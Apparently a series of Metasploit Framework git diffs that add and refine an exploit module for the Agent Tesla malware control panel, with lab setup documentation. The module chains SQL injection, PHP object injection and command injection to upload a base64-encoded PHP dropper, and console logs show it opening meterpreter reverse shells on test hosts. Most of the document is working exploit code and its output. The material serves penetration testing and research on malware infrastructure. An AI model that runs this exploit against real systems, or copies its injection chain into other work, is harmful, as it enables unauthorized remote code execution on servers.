 12. Set the `Database Host` field to `127.0.0.1`, the `MySql Username` field to `root`, leave the `MySql Password` field,
@@ -176,6 +176,8 @@ msf5 exploit(multi/http/agent_tesla_panel_rce) > check
 msf5 exploit(multi/http/agent_tesla_panel_rce) > exploit
 
 [*] Started reverse TCP handler on 169.254.115.5:6633
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target is vulnerable.
 [*] Targeted operating system is: windows
 [*] Sending php/meterpreter/reverse_tcp command payload
 [*] Payload uploaded as: .rzzg.php to C:\wamp64\www\\WebPanel\\server_side\scripts\.rzzg.php
@@ -256,6 +258,8 @@ Exploit target:
 msf5 exploit(multi/http/agent_tesla_panel_rce) > exploit
 
 [*] Started reverse TCP handler on 169.254.115.5:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target is vulnerable.
 [*] Targeted operating system is: windows
 [*] Sending php/meterpreter/reverse_tcp command payload
 [*] Payload uploaded as: .UKtE.php to C:\wamp64\www\\WebPanel\\server_side\scripts\.UKtE.php
@@ -293,8 +297,6 @@ meterpreter >
 ### WebPanel3.7z on Windows 10 x64 19H2 with WAMP 3.2.2.2 x64, PHP 7.3.12, Apache 2.4.41, MariaDB 10.4.10
 ```
 msf5 > use exploit/multi/http/agent_tesla_panel_rce
-msf5 exploit(multi/http/agent_tesla_panel_rce) > show optons
-[-] Invalid parameter "optons", use "show -h" for more information
 msf5 exploit(multi/http/agent_tesla_panel_rce) > show options
 
 Module options (exploit/multi/http/agent_tesla_panel_rce):
@@ -332,12 +334,6 @@ msf5 exploit(multi/http/agent_tesla_panel_rce) > set LHOST 169.254.115.5
 LHOST => 169.254.115.5
 msf5 exploit(multi/http/agent_tesla_panel_rce) > set LPORT 5566
 LPORT => 5566
-msf5 exploit(multi/http/agent_tesla_panel_rce) > exploit
-
-[*] Started reverse TCP handler on 169.254.115.5:5566
-[!] Unauthenticated RCE can't be exploited, retry if you gain CnC credentials.
-[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable.
-[*] Exploit completed, but no session was created.
 msf5 exploit(multi/http/agent_tesla_panel_rce) > set USERNAME test
 USERNAME => test
 msf5 exploit(multi/http/agent_tesla_panel_rce) > set PASSWORD test
@@ -345,6 +341,8 @@ PASSWORD => test
 msf5 exploit(multi/http/agent_tesla_panel_rce) > exploit
 
 [*] Started reverse TCP handler on 169.254.115.5:5566
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target is vulnerable.
 [*] Targeted operating system is: windows
 [*] Sending php/meterpreter/reverse_tcp command payload
 [*] Payload uploaded as: .RVfu.php to C:\wamp64\www\\WebPanel\\server_side\scripts\.RVfu.php

--- a/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md
+++ b/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md
@@ -132,22 +132,6 @@ Follow [Setup](#Setup) and [Scenarios](#Scenarios).
 
 The Agent Tesla CnC password to authenticate with (needed if you attempt an authenticated RCE).
 
-**Proxies**
-
-A proxy chain of format type:host:port[,type:host:port][...]. It's optional.
-
-**RHOSTS**
-
-The target IP address on which the control center responds.
-
-**RPORT**
-
-The target TCP port on which the control center responds. Default: 80
-
-**SSL**
-
-Negotiate SSL/TLS for outgoing connections. Default: false
-
 **TARGETURI**
 
 The base URI path of control center. Default: '/WebPanel'
@@ -155,10 +139,6 @@ The base URI path of control center. Default: '/WebPanel'
 **USERNAME**
 
 The Agent Tesla CnC username to authenticate with (needed if you attempt an authenticated RCE).
-
-**VHOST**
-
-The target HTTP server virtual host.
 
 ## Targets
 

--- a/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md
+++ b/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md
@@ -65,11 +65,10 @@ For this, you can use a Linux Debian 9.9.0 (Stretch) x86_x64 as sandboxing syste
 1. Install LAMP (Apache, MySQL, PHP).
 
 ```bash
-sudo apt-get install apache2 apache2-utils mariadb-server mariadb-client ca-certificates apt-transport-https
-
-wget -q https://packages.sury.org/php/apt.gpg -O- | sudo apt-key add -
-echo "deb https://packages.sury.org/php/ stretch main" | sudo tee /etc/apt/sources.list.d/php.list
+sudo apt-add repository ppa:ondrej/apache2
+sudo apt-add repository ppa:ondrej/php
 sudo apt-get update
+sudo apt-get install apache2 apache2-utils mariadb-server mariadb-client ca-certificates apt-transport-https
 
 # For PHP 5.6.40:
 sudo apt-get install php5.6 php5.6-cli php5.6-common php5.6-curl php5.6-mbstring php5.6-mysql php5.6-xml libapache2-mod-php5.6 php5.6-json php5.6-opcache php5.6-readline
@@ -77,10 +76,12 @@ sudo apt-get install php5.6 php5.6-cli php5.6-common php5.6-curl php5.6-mbstring
 # For PHP 7.2.31:
 sudo apt-get install php7.2 php7.2-cli php7.2-common php7.2-curl php7.2-mbstring php7.2-mysql php7.2-xml libapache2-mod-php7.2 php7.2-json php7.2-opcache php7.2-readline
 
+Finally:
+
 sudo mysql_secure_installation
 ```
 
-2. Create a blank database for Agant Tesla web panel.
+2. Create a blank database for the Agent Tesla web panel.
 
 ```
 sudo mysql -u root -ppassword
@@ -92,6 +93,35 @@ GRANT ALL PRIVILEGES ON `tesla`.* TO 'user'@localhost;
 FLUSH PRIVILEGES;
 exit
 ```
+
+3. Get the Agent Tesla control panels
+
+```
+wget https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel1.7z
+wget https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel2.7z
+wget https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel3.7z
+```
+
+4. Install the p7zip-full package and extract the files from the command line
+```
+sudo apt install p7zip-full
+7z x WebPanel1.7z && mv WebPanel/ WebPanel1/
+7z x WebPanel2.7z && mv WebPanel/ WebPanel2/
+7z x WebPanel3.7z && mv WebPanel/ WebPanel3/
+
+```
+5. Copy one of the target webpanels over for installation and delete the default config.php file
+```
+sudo cp -r WebPanel3/WebPanel/ /var/www/html/
+sudo rm -rf /var/www/html/WebPanel/config.php
+```
+6. Make the /var/www/html/WebPanel/ directory readable and writeable by all
+```
+chmod a+rw /var/www/html/WebPanel/
+```
+7. Browse to http://127.0.0.1/WebPanel/setup.php and set the `Database Host` field to `127.0.0.1`, the `MySql Username` field to `user`, the `MySql Password` field to `password`, the `Database Name` field to `tesla`, the `Username` and `Password` fields under `Login Informations` section to the username and password you would like to log into the web panel as.
+
+8. Browse to `http://127.0.0.1/WebPanel/logout.php` to ensure you are properly logged out. Then browse to Browse to `http://127.0.0.1/WebPanel/login.php` and log in with the login details you placed in the `Login Informations` section. You should see a header titled `Dashboard` followed by some sections labeled `Computers`, `Keystrokes`, `Passwords` and `Screenshots` if the login succeeded.
 
 #### Installing Ioncube
 

--- a/modules/exploits/multi/http/agent_tesla_panel_rce.rb
+++ b/modules/exploits/multi/http/agent_tesla_panel_rce.rb
@@ -1,0 +1,189 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Agent Tesla Panel Remote Code Execution',
+      'Description' => %q{
+        This module exploit the command injection vulnerability in control center of the agent Tesla.
+      },
+      'Author' => [
+        'Ege Balcı <ege.balci@invictuseurope.com>', # discovery and independent module
+        'mekhalleh (RAMELLA Sébastien)' # add. targetting windows
+      ],
+      'References' => [
+        ['URL', 'https://github.com/mekhalleh/agent_tesla_panel_rce/tree/master/resources'], # Agent-Tesla WebPanel available for download
+        ['URL', 'https://www.cyber.nj.gov/threat-profiles/trojan-variants/agent-tesla'],
+        ['URL', 'https://krebsonsecurity.com/2018/10/who-is-agent-tesla/']
+      ],
+      'DisclosureDate' => '2018-07-10',
+      'License' => MSF_LICENSE,
+      'Platform' => ['unix', 'windows'],
+      'Arch' => [ARCH_CMD, ARCH_PHP],
+      'Privileged' => true,
+      'Targets' => [
+        ['Automatic (Dropper)',
+          'Platform' => 'php',
+          'Arch' => [ARCH_PHP],
+          'Type' => :php_dropper,
+          'DefaultOptions' => {
+            'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+          }
+        ],
+        ['Unix (In-Memory)',
+          'Platform' => 'unix',
+          'Arch' => ARCH_CMD,
+          'Type' => :unix_memory,
+          'DefaultOptions' => {
+            'PAYLOAD' => 'cmd/unix/generic'
+          }
+        ],
+        ['Windows (In-Memory)',
+          'Platform' => 'windows',
+          'Arch' => ARCH_CMD,
+          'Type' => :windows_memory,
+          'DefaultOptions' => {
+            'PAYLOAD' => 'cmd/windows/reverse_powershell'
+          }
+        ],
+      ],
+      'DefaultTarget' => 0,
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'Reliability' => [REPEATABLE_SESSION],
+        'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+      }
+    ))
+
+    register_options([
+      Opt::RPORT(80),
+      OptString.new('TARGETURI', [true, 'The URI of the tesla agent with panel path', '/WebPanel/']),
+    ])
+  end
+
+  def get_os
+    received = parse_response(execute_command('echo $PATH'))
+    ## Not linux, check Windows.
+    if(received.include?('$PATH'))
+      received = parse_response(execute_command('echo %PATH%'))
+    end
+
+    os = false
+    if(received =~ /^\//)
+      os = 'linux'
+    elsif(received =~ /^[a-zA-Z]:\\/)
+      os = 'windows'
+    end
+
+    return(os)
+  end
+
+  def parse_response(js)
+    if js
+      json = {}
+      begin
+        json = JSON.parse(sanitize_json(js.body))
+        return "#{json['data'][0]['username']}"
+      rescue JSON::ParserError
+      end
+    end
+
+    return false
+  end
+
+  def sanitize_json(js)
+    js.gsub!("},\r\n]", "}]")
+    js.gsub!("'", '"')
+    return js.gsub('", }', '"}')
+  end
+
+  def execute_command(command)
+    response = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/server_side/scripts/server_processing.php'),
+      'encode_params' => true,
+      'vars_get' => {
+        'table' => 'passwords',
+        'primary' => 'password_id',
+        'clmns' => 'a:1:{i:0;a:3:{s:2:"db";s:3:"pwd";s:2:"dt";s:8:"username";s:9:"formatter";s:4:"exec";}}',
+        'where' => Rex::Text.encode_base64("1=1 UNION SELECT \"#{command}\"")
+      }
+    )
+    if (response) && (response.body)
+      return response
+    end
+
+    return false
+  end
+
+  def check
+    rand_str = Rex::Text.rand_text_alpha(8)
+    received = parse_response(execute_command("echo #{rand_str}"))
+    if (received) && (received.include?(rand_str))
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    unless check.eql? Exploit::CheckCode::Vulnerable
+      fail_with(Failure::NotVulnerable, 'The target is not exploitable.')
+    end
+    vprint_good("The target appears to be vulnerable.")
+
+    case target['Type']
+    when :unix_memory, :windows_memory
+      print_status("Sending #{datastore['PAYLOAD']} command payload")
+      vprint_status("Generated command payload: #{payload.encoded}")
+
+      received = execute_command(payload.encoded)
+      if (received) && (datastore['PAYLOAD'] == "cmd/#{target['Platform']}/generic")
+        print_warning('Dumping command output in parsed json response')
+        output = parse_response(received)
+        if output.empty?
+          print_error('Empty response, no command output')
+          return
+        end
+        print_line("#{output}")
+      end
+    when :php_dropper
+      unless os = get_os
+        print_bad('Could not determine the targeted operating system.')
+        return Msf::Exploit::Failed
+      end
+      print_status("Targeted operating system is: #{os}")
+
+      file_name = '.' + Rex::Text.rand_text_alpha(4) + '.php'
+      case(os)
+      when /linux/
+        cmd = "echo #{Rex::Text.encode_base64(payload.encoded)} | base64 -d > #{file_name}"
+      when /windows/
+        cmd = "echo #{Rex::Text.encode_base64(payload.encoded)} > #{file_name}.b64 & certutil -decode #{file_name}.b64 #{file_name} & del #{file_name}.b64"
+      end
+      print_status("Sending #{datastore['PAYLOAD']} command payload")
+      vprint_status("Generated command payload: #{cmd}")
+
+      received = execute_command(cmd)
+      unless (received) && (received.code == 200) && (received.body.include?('recordsTotal'))
+        print_error('Payload upload failed :(')
+        return(Msf::Exploit::Failed)
+      end
+      print_status("Payload uploaded as: #{file_name}")
+
+      ## Triggering.
+      send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, '/server_side/scripts/', file_name)
+      }, 2.5)
+    end
+  end
+
+end

--- a/modules/exploits/multi/http/agent_tesla_panel_rce.rb
+++ b/modules/exploits/multi/http/agent_tesla_panel_rce.rb
@@ -25,6 +25,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'mekhalleh (RAMELLA Sébastien)' # add. targetting windows and authenticated RCE
       ],
       'References' => [
+        ['EDB', '47256'], # original module published.
         ['URL', 'https://github.com/mekhalleh/agent_tesla_panel_rce/tree/master/resources'], # Agent-Tesla WebPanel's available for download
         ['URL', 'https://www.pirates.re/agent-tesla-remote-command-execution-(fighting-the-webpanel)'], # fr
         ['URL', 'https://www.cyber.nj.gov/threat-profiles/trojan-variants/agent-tesla'],

--- a/modules/exploits/multi/http/agent_tesla_panel_rce.rb
+++ b/modules/exploits/multi/http/agent_tesla_panel_rce.rb
@@ -14,12 +14,14 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Agent Tesla Panel Remote Code Execution',
         'Description' => %q{
-          This module exploit a command injection vulnerability (authenticated and unauthenticated)
-          in the control center of the agent Tesla.
-
-          The Unauthenticated RCE is possible by mixing two vulnerabilities (SQLi + PHP Object Injection).
-          By observing other sources of this panel I found on the Internet to watch the patch, I concluded
-          that the vulnerability was transfomed to an Authenticated RCE.
+          This module exploits a command injection vulnerability within the Agent Tesla control panel, 
+          in combination with an SQL injection vulnerability and a PHP object injection vulnerabilty, to gain 
+          remote code execution on affected hosts. 
+          
+          Panel versions released prior to Sepetember 12, 2018 can be exploited by unauthenticated attackers to
+          gain remote code execution as user running the web server. Agent Tesla panels released on or after
+          this date can still be exploited however, provided that attackers have valid credentials for the
+          Agent Tesla control panel.
         },
         'Author' => [
           'Ege Balcı <ege.balci@invictuseurope.com>', # discovery and independent module

--- a/modules/exploits/multi/http/agent_tesla_panel_rce.rb
+++ b/modules/exploits/multi/http/agent_tesla_panel_rce.rb
@@ -6,140 +6,142 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  include Msf::Exploit::FileDropper
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name' => 'Agent Tesla Panel Remote Code Execution',
-      'Description' => %q{
-        This module exploit a command injection vulnerability (authenticated and unauthenticated)
-        in the control center of the agent Tesla.
+    super(
+      update_info(
+        info,
+        'Name' => 'Agent Tesla Panel Remote Code Execution',
+        'Description' => %q{
+          This module exploit a command injection vulnerability (authenticated and unauthenticated)
+          in the control center of the agent Tesla.
 
-        The Unauthenticated RCE is possible by mixing two vulnerabilities (SQLi + PHP Object Injection).
-        By observing other sources of this panel find on the Internet to watch the patch, I concluded
-        that the vulnerability is transfomed to an Authenticated RCE.
-      },
-      'Author' => [
-        'Ege Balcı <ege.balci@invictuseurope.com>', # discovery and independent module
-        'mekhalleh (RAMELLA Sébastien)' # add. targetting windows and authenticated RCE
-      ],
-      'References' => [
-        ['EDB', '47256'], # original module published.
-        ['URL', 'https://github.com/mekhalleh/agent_tesla_panel_rce/tree/master/resources'], # Agent-Tesla WebPanel's available for download
-        ['URL', 'https://www.pirates.re/agent-tesla-remote-command-execution-(fighting-the-webpanel)'], # fr
-        ['URL', 'https://www.cyber.nj.gov/threat-profiles/trojan-variants/agent-tesla'],
-        ['URL', 'https://krebsonsecurity.com/2018/10/who-is-agent-tesla/']
-      ],
-      'DisclosureDate' => '2018-07-10',
-      'License' => MSF_LICENSE,
-      'Platform' => ['php', 'unix', 'windows'],
-      'Arch' => [ARCH_CMD, ARCH_PHP],
-      'Privileged' => true,
-      'Targets' => [
-        ['Automatic (Dropper)',
-          'Platform' => 'php',
-          'Arch' => [ARCH_PHP],
-          'Type' => :php_dropper,
-          'DefaultOptions' => {
-            'PAYLOAD' => 'php/meterpreter/reverse_tcp'
-          }
+          The Unauthenticated RCE is possible by mixing two vulnerabilities (SQLi + PHP Object Injection).
+          By observing other sources of this panel I found on the Internet to watch the patch, I concluded
+          that the vulnerability was transfomed to an Authenticated RCE.
+        },
+        'Author' => [
+          'Ege Balcı <ege.balci@invictuseurope.com>', # discovery and independent module
+          'mekhalleh (RAMELLA Sébastien)' #  added windows targeting and authenticated RCE
         ],
-        ['Unix (In-Memory)',
-          'Platform' => 'unix',
-          'Arch' => ARCH_CMD,
-          'Type' => :unix_memory,
-          'DefaultOptions' => {
-            'PAYLOAD' => 'cmd/unix/generic'
-          }
+        'References' => [
+          ['EDB', '47256'], # original module published.
+          ['URL', 'https://github.com/mekhalleh/agent_tesla_panel_rce/tree/master/resources'], # Agent-Tesla WebPanel's available for download
+          ['URL', 'https://www.pirates.re/agent-tesla-remote-command-execution-(fighting-the-webpanel)'], # fr
+          ['URL', 'https://krebsonsecurity.com/2018/10/who-is-agent-tesla/']
         ],
-        ['Windows (In-Memory)',
-          'Platform' => 'windows',
-          'Arch' => ARCH_CMD,
-          'Type' => :windows_memory,
-          'DefaultOptions' => {
-            'PAYLOAD' => 'cmd/windows/reverse_powershell'
-          }
+        'DisclosureDate' => '2018-07-10',
+        'License' => MSF_LICENSE,
+        'Platform' => ['php', 'unix', 'windows'],
+        'Arch' => [ARCH_CMD, ARCH_PHP],
+        'Privileged' => false,
+        'Targets' => [
+          ['Automatic (PHP-Dropper)', {
+            'Platform' => 'php',
+            'Arch' => [ARCH_PHP],
+            'Type' => :php_dropper,
+            'DefaultOptions' => {
+              'PAYLOAD' => 'php/meterpreter/reverse_tcp',
+              'DisablePayloadHandler' => 'false'
+            }
+          }],
+          ['Unix (In-Memory)', {
+            'Platform' => 'unix',
+            'Arch' => ARCH_CMD,
+            'Type' => :unix_memory,
+            'DefaultOptions' => {
+              'PAYLOAD' => 'cmd/unix/generic',
+              'DisablePayloadHandler' => 'true'
+            }
+          }],
+          ['Windows (In-Memory)', {
+            'Platform' => 'windows',
+            'Arch' => ARCH_CMD,
+            'Type' => :windows_memory,
+            'DefaultOptions' => {
+              'PAYLOAD' => 'cmd/windows/generic',
+              'DisablePayloadHandler' => 'true'
+            }
+          }],
         ],
-      ],
-      'DefaultTarget' => 0,
-      'Notes' => {
-        'Stability' => [CRASH_SAFE],
-        'Reliability' => [REPEATABLE_SESSION],
-        'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
-      }
-    ))
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
 
     register_options([
-      OptString.new('PASSWORD', [false, 'The Agent Tesla CnC password to authenticate with']),
+      OptString.new('PASSWORD', [false, 'The Agent Tesla CnC password to authenticate with', nil]),
       OptString.new('TARGETURI', [true, 'The URI of the tesla agent with panel path', '/WebPanel/']),
-      OptString.new('USERNAME', [false, 'The Agent Tesla CnC username to authenticate with'])
+      OptString.new('USERNAME', [false, 'The Agent Tesla CnC username to authenticate with', nil])
+    ])
+
+    register_advanced_options([
+      OptBool.new('ForceExploit', [false, 'Override check result', false])
     ])
   end
 
-  def get_os
-    received = parse_response(execute_command('echo $PATH'))
+  def os_get_name
+    response = parse_response(execute_command('echo $PATH'))
+
     ## Not linux, check Windows.
-    if(received.include?('$PATH'))
-      received = parse_response(execute_command('echo %PATH%'))
+    response = parse_response(execute_command('echo %PATH%')) if response.include?('$PATH')
+
+    os_name = ''
+    if response =~ %r{^\/}
+      os_name = 'linux'
+    elsif response =~ /^[a-zA-Z]:\\/
+      os_name = 'windows'
     end
 
-    os = false
-    if(received =~ /^\//)
-      os = 'linux'
-    elsif(received =~ /^[a-zA-Z]:\\/)
-      os = 'windows'
-    end
-
-    return(os)
+    os_name
   end
 
   def parse_response(js)
-    return false unless js
-    json = JSON.parse(sanitize_json(js.body))
-    return "#{json['data'][0]['HWID']}"
-  rescue
-    return false
+    return '' unless js
+
+    begin
+      return js.get_json_document['data'][0].values.join
+    rescue NoMethodError
+      return ''
+    end
+    return ''
   end
 
-  def sanitize_json(js)
-    js.gsub!("},\r\n]", "}]")
-    js.gsub!("'", '"')
-    return js.gsub('", }', '"}')
-  end
-
-  def execute_command(command, opts = {})
+  def execute_command(command, _opts = {})
     junk = rand(1_000)
+    sql_prefix = Rex::Text.to_rand_case("#{junk} LIKE #{junk} UNION SELECT ")
     requested_payload = {
       'table' => 'passwords',
       'primary' => 'HWID',
       'clmns' => 'a:1:{i:0;a:3:{s:2:"db";s:4:"HWID";s:2:"dt";s:4:"HWID";s:9:"formatter";s:4:"exec";}}',
-      'where' => Rex::Text.encode_base64("#{junk}=#{junk} UNION SELECT \"#{command}\"")
+      'where' => Rex::Text.encode_base64("#{sql_prefix}\"#{command}\"")
     }
+    cookie = auth_get_cookie
 
-    cookie = get_auth
     request = {
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'server_side', 'scripts', 'server_processing.php')
     }
-    if cookie != :not_auth
-      request = request.merge({'cookie' => cookie})
-    end
-
+    request = request.merge({ 'cookie' => cookie }) if cookie != :not_auth
     request = request.merge({
       'encode_params' => true,
       'vars_get' => requested_payload
     })
 
     response = send_request_cgi(request)
-    if (response) && (response.body)
-      return response
-    end
+    return false unless response
 
-    return false
+    return response if response.body
+
+    false
   end
 
-  def get_auth
+  def auth_get_cookie
     if datastore['USERNAME'] && datastore['PASSWORD']
       response = send_request_cgi(
         'method' => 'POST',
@@ -149,71 +151,80 @@ class MetasploitModule < Msf::Exploit::Remote
           'Password' => datastore['PASSWORD']
         }
       )
-      if (response) && (response.code == 302) && (response.headers['location'] =~ /index.php/)
-        return response.get_cookies
-      end
+      return :not_auth unless response
+
+      return response.get_cookies if response.redirect? && response.headers['location'] =~ /index.php/
     end
 
-    return :not_auth
+    :not_auth
   end
 
   def check
     # check for login credentials couple.
-    if ((datastore['USERNAME']) && (datastore['PASSWORD'].nil?)) ||
-      ((datastore['PASSWORD']) && (datastore['USERNAME'].nil?))
-      fail_with(Failure::BadConfig, 'Bad login credentials couple')
+    if datastore['USERNAME'] && datastore['PASSWORD'].nil?
+      fail_with(Failure::BadConfig, 'The USERNAME option is defined but PASSWORD is not, please set PASSWORD.')
     end
 
-    received = send_request_cgi(
+    if datastore['PASSWORD'] && datastore['USERNAME'].nil?
+      fail_with(Failure::BadConfig, 'The PASSWORD option is defined but USERNAME is not, please set USERNAME.')
+    end
+
+    response = send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'server_side', 'scripts', 'server_processing.php')
     )
-    if (received) && (received.code == 302) && (received.headers['location'] =~ /login.php/)
-      unless datastore['USERNAME'] && datastore['PASSWORD']
-        print_warning("Unauthenticated RCE can't be exploited, retry if you gain CnC credentials.")
-        return Exploit::CheckCode::Unknown
+
+    if response
+      if response.redirect? && response.headers['location'] =~ /login.php/
+        unless datastore['USERNAME'] && datastore['PASSWORD']
+          print_warning('Unauthenticated RCE can\'t be exploited, retry if you gain CnC credentials.')
+          return Exploit::CheckCode::Unknown
+        end
       end
+
+      rand_str = Rex::Text.rand_text_alpha(8..16)
+      cmd_output = parse_response(execute_command("echo #{rand_str}"))
+
+      return Exploit::CheckCode::Vulnerable if cmd_output.include?(rand_str)
     end
 
-    rand_str = Rex::Text.rand_text_alpha(8)
-    received = parse_response(execute_command("echo #{rand_str}"))
-    if (received) && (received.include?(rand_str))
-      return Exploit::CheckCode::Vulnerable
-    end
-
-    return Exploit::CheckCode::Safe
+    Exploit::CheckCode::Safe
   end
 
   def exploit
-    unless check.eql? Exploit::CheckCode::Vulnerable
-      fail_with(Failure::NotVulnerable, 'The target is not exploitable.')
+    unless datastore['ForceExploit']
+      if check != Exploit::CheckCode::Vulnerable
+        fail_with(Failure::NotVulnerable, 'The target is not exploitable.')
+      end
+      vprint_good('The target appears to be vulnerable.')
     end
-    vprint_good("The target appears to be vulnerable.")
 
     case target['Type']
     when :unix_memory, :windows_memory
       print_status("Sending #{datastore['PAYLOAD']} command payload")
       vprint_status("Generated command payload: #{payload.encoded}")
 
-      received = execute_command(payload.encoded)
-      if (received) && (datastore['PAYLOAD'] == "cmd/#{target['Platform']}/generic")
-        print_warning('Dumping command output in parsed json response')
-        output = parse_response(received)
-        if output.empty?
+      cmd_output = execute_command(payload.encoded)
+      if cmd_output && datastore['PAYLOAD'] == "cmd/#{target['Platform']}/generic"
+        print_warning('Dumping command output in parsed json response (can be incomplete).')
+        cmd_output = parse_response(cmd_output)
+        if cmd_output.empty?
           print_error('Empty response, no command output')
           return
         end
-        print_line("#{output}")
+        print_line(cmd_output.to_s)
       end
+
     when :php_dropper
-      unless os = get_os
+      os = os_get_name
+      unless os
         print_bad('Could not determine the targeted operating system.')
         return Msf::Exploit::Failed
       end
       print_status("Targeted operating system is: #{os}")
 
       file_name = '.' + Rex::Text.rand_text_alpha(4) + '.php'
-      case(os)
+      case os
       when /linux/
         cmd = "echo #{Rex::Text.encode_base64(payload.encoded)} | base64 -d > #{file_name}"
       when /windows/
@@ -222,15 +233,15 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status("Sending #{datastore['PAYLOAD']} command payload")
       vprint_status("Generated command payload: #{cmd}")
 
-      received = execute_command(cmd)
-      unless (received) && (received.code == 200) && (received.body.include?('recordsTotal'))
+      response = execute_command(cmd)
+      unless response && response.code == 200 && response.body.include?('recordsTotal')
         print_error('Payload upload failed :(')
         return Msf::Exploit::Failed
       end
       print_status("Payload uploaded as: #{file_name}")
       register_file_for_cleanup file_name
 
-      ## Triggering.
+      ## Triggering payload.
       send_request_cgi({
         'method' => 'GET',
         'uri' => normalize_uri(target_uri.path, 'server_side', 'scripts', file_name)

--- a/modules/exploits/multi/http/agent_tesla_panel_rce.rb
+++ b/modules/exploits/multi/http/agent_tesla_panel_rce.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
     super(
@@ -25,7 +26,8 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'Author' => [
           'Ege Balcı <ege.balci@invictuseurope.com>', # discovery and independent module
-          'mekhalleh (RAMELLA Sébastien)' #  added windows targeting and authenticated RCE
+          'mekhalleh (RAMELLA Sébastien)', # Added windows targeting and authenticated RCE
+          'gwillcox-r7' # Multiple edits to finish porting the exploit over to Metasploit
         ],
         'References' => [
           ['EDB', '47256'], # Original PoC and Metasploit module
@@ -78,12 +80,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options([
       OptString.new('PASSWORD', [false, 'The Agent Tesla CnC password to authenticate with', nil]),
-      OptString.new('TARGETURI', [true, 'The URI of the tesla agent with panel path', '/WebPanel/']),
+      OptString.new('TARGETURI', [true, 'The URI where the Agent Tesla CnC panel is located on the target', '/WebPanel/']),
       OptString.new('USERNAME', [false, 'The Agent Tesla CnC username to authenticate with', nil])
     ])
 
     register_advanced_options([
-      OptBool.new('ForceExploit', [false, 'Override check result', false])
+      OptBool.new('ForceExploit', [false, "Exploit the target without checking if it is vulnerable", false])
     ])
   end
 
@@ -240,10 +242,15 @@ class MetasploitModule < Msf::Exploit::Remote
         print_error('Payload upload failed :(')
         return Msf::Exploit::Failed
       end
-      print_status("Payload uploaded as: #{file_name}")
-      register_file_for_cleanup file_name
+      if os == 'windows'
+        panel_uri = datastore['TARGETURI'].gsub("/", "\\")
+        print_status("Payload uploaded as: #{file_name} to C:\\wamp64\\www\\#{panel_uri}\\server_side\\scripts\\#{file_name}")
+        register_file_for_cleanup("C:\\wamp64\\www\\#{panel_uri}\\server_side\\scripts\\#{file_name}")
+      else
+        print_status("Payload uploaded as: #{file_name}")
+      end
 
-      ## Triggering payload.
+      # Triggering payload.
       send_request_cgi({
         'method' => 'GET',
         'uri' => normalize_uri(target_uri.path, 'server_side', 'scripts', file_name)

--- a/modules/exploits/multi/http/agent_tesla_panel_rce.rb
+++ b/modules/exploits/multi/http/agent_tesla_panel_rce.rb
@@ -41,33 +41,39 @@ class MetasploitModule < Msf::Exploit::Remote
         'Arch' => [ARCH_CMD, ARCH_PHP],
         'Privileged' => false,
         'Targets' => [
-          ['Automatic (PHP-Dropper)', {
-            'Platform' => 'php',
-            'Arch' => [ARCH_PHP],
-            'Type' => :php_dropper,
-            'DefaultOptions' => {
-              'PAYLOAD' => 'php/meterpreter/reverse_tcp',
-              'DisablePayloadHandler' => 'false'
+          [
+            'Automatic (PHP-Dropper)', {
+              'Platform' => 'php',
+              'Arch' => [ARCH_PHP],
+              'Type' => :php_dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'php/meterpreter/reverse_tcp',
+                'DisablePayloadHandler' => 'false'
+              }
             }
-          }],
-          ['Unix (In-Memory)', {
-            'Platform' => 'unix',
-            'Arch' => ARCH_CMD,
-            'Type' => :unix_memory,
-            'DefaultOptions' => {
-              'PAYLOAD' => 'cmd/unix/generic',
-              'DisablePayloadHandler' => 'true'
+          ],
+          [
+            'Unix (In-Memory)', {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_memory,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/generic',
+                'DisablePayloadHandler' => 'true'
+              }
             }
-          }],
-          ['Windows (In-Memory)', {
-            'Platform' => 'windows',
-            'Arch' => ARCH_CMD,
-            'Type' => :windows_memory,
-            'DefaultOptions' => {
-              'PAYLOAD' => 'cmd/windows/generic',
-              'DisablePayloadHandler' => 'true'
+          ],
+          [
+            'Windows (In-Memory)', {
